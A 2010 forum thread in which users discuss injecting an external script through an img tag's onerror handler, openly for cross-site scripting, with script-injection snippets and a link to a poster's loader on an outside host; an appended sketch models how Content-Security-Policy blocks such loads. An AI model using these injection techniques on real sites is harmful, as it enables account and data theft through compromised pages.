Loading jscript into img tag


Guest
Posted on 18-04-10 01:09
Hello.
Does anybody know how to load a jscript into an image tag during an onerror event?
ex: <img src="bla.jpg" onerror=\load jscript from some external site\>

Thank you


SySTeM
Posted on 18-04-10 01:11
Pretty sure you can only use inline JavaScript, not external scripts.


spyware
Posted on 18-04-10 01:29
Actually, there is a way.

http://spysballoon.ath.cx/hack

Open error_image.html



SySTeM
Posted on 18-04-10 01:35
You'd have to be able to create an iframe first though, unless you can use JavaScript's createElement method via the img tag also.


Edited by SySTeM on 18-04-10 01:37

Guest
Posted on 18-04-10 02:03
spyware wrote:
Actually, there is a way.

http://spysballoon.ath.cx/hack

Open error_image.html


What is http://spysballoon.ath.cx/hack/loader.php for?


spyware
Posted on 18-04-10 02:05
BlaX wrote:
What is http://spysballoon.ath.cx/hack/loader.php for?


I didn't want to bother writing RegEx so I used a loader. You can execute code without it if you use RegEx and add a <script> tag to the page.



Guest
Posted on 18-04-10 03:44
system_meltdown wrote:
... unless you can use JavaScript's createElement method via the img tag also.

You can. IE6 (and possibly IE7) dislike when you do anything DOM-related inside the body of the doc, but no one with any sense uses that browser anymore.

Most importantly, though, you could just skip the whole iframe bit and just use DOM functions to add a script tag with the src of the external script.


elmiguel
Posted on 19-04-10 17:14
Couldn't you just point to a local js function that imports an external one?

something like:

Code


<script type="text/javascript">
function importScript(url){
    var tag = document.createElement("script");
    tag.type="text/javascript";
    tag.src = url;
    document.body.appendChild(tag);
}
window.onload = function(){
    // imports go here
    importScript("foo.js"); // example
};
</script>







Guest
Posted on 19-04-10 18:01
Also.. Correct me if I'm wrong but if there's an XSS you can use the script tag to create variables, thus if you inject:

Code

<script type="text/javascript">
  var doc=document.open("text/html","replace");
  var txt="<html><body><script src='source here'></script></body></html>";
  doc.write(txt);
  doc.close();
 
</script>





Edit: Sorry scratch that, that closes the first script tag.. but perhaps there's a way to get around that?.. Anyway it was just an idea.




Edited by on 19-04-10 18:02
Guest
Posted on 21-04-10 12:49
elmiguel wrote:
Couldn't you just point to a local js function that imports an external one?

something like:
<snip>

Obviously, loading a local js file containing a helper function would be great. Then, of course, there wouldn't be a need for an external script... especially not in the onerror event of an image.

... but this is clearly an XSS question, so no local access.

SaMTHG wrote:
I'm wrong but if there's an XSS you can use the script tag to create variables, thus if you inject:

<snip>

Edit: Sorry scratch that, that closes the first script tag.. but perhaps there's a way to get around that?

document.write is really a dinosaur nowadays. I can't think of a single reason why anyone should be using it.

The (better) alternative is using DOM functions or, at the very least, hacking something together with document.getElementById / getElementsByName / getElementsByTagName and some lazy innerHTML implementation. In the case of inserting the script tag, you pretty much have to stick to DOM functions. The loader a couple posts up illustrates the concept pretty well.
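
Added example, not part of the thread: the technique discussed above needs two things to succeed, an inline onerror handler that runs and a script element that is allowed to fetch an external src, and a Content-Security-Policy header can refuse either one. The sketch below is a simplified model of how a browser evaluates a policy against those two steps; the function names, origins and URL are constructed for illustration, and the things it does not model are listed in its first comment.

```javascript
// Added example: simplified CSP model. Not modelled: 'strict-dynamic' for
// script elements, 'unsafe-hashes', ports and paths in host sources.
function parseCsp(header) {
  const policy = {};
  for (const part of header.split(";")) {
    const [name, ...sources] = part.trim().toLowerCase().split(/\s+/);
    if (name && !(name in policy)) policy[name] = sources; // first one wins
  }
  return policy;
}
// Source list of the first directive in the fallback chain, or null.
function effective(policy, chain) {
  for (const d of chain) if (d in policy) return policy[d];
  return null;
}

// Step 1: may an inline handler such as onerror="..." execute?
function inlineHandlerAllowed(policy) {
  const list = effective(policy, ["script-src-attr", "script-src", "default-src"]);
  if (list === null) return true; // no policy covers scripts
  // A nonce, hash or 'strict-dynamic' makes browsers ignore 'unsafe-inline'.
  const ignored = list.some(s => /^'(nonce-|sha(256|384|512)-|strict-dynamic')/.test(s));
  return list.includes("'unsafe-inline'") && !ignored;
}

// Step 2: may a <script> element fetch scriptUrl?
function externalScriptAllowed(policy, scriptUrl, pageOrigin) {
  const list = effective(policy, ["script-src-elem", "script-src", "default-src"]);
  if (list === null) return true;
  const url = new URL(scriptUrl);
  return list.some(s => {
    if (s === "'self'") return url.origin === pageOrigin;
    if (s.startsWith("'")) return false; // other keywords, nonces, hashes
    if (s === "*") return /^https?:$/.test(url.protocol);
    if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return url.protocol === s;
    const m = s.match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?([^\/:]+)/);
    if (!m || (m[1] && m[1] + ":" !== url.protocol)) return false;
    return m[2].startsWith("*.") ? url.hostname.endsWith(m[2].slice(1)) : url.hostname === m[2];
  });
}

function assess(header, scriptUrl, pageOrigin) {
  const policy = parseCsp(header);
  const handlerRuns = inlineHandlerAllowed(policy);
  const externalLoads = handlerRuns && externalScriptAllowed(policy, scriptUrl, pageOrigin);
  return { handlerRuns, externalLoads };
}
// Constructed sample values, not taken from the thread.
console.log(assess("script-src 'self' 'unsafe-inline'", "https://scripts.example.net/foo.js", "https://forum.example"));
```

A policy that keeps 'unsafe-inline' still lets the handler itself run even when the external fetch is refused, so the inline allowance is the setting to remove first.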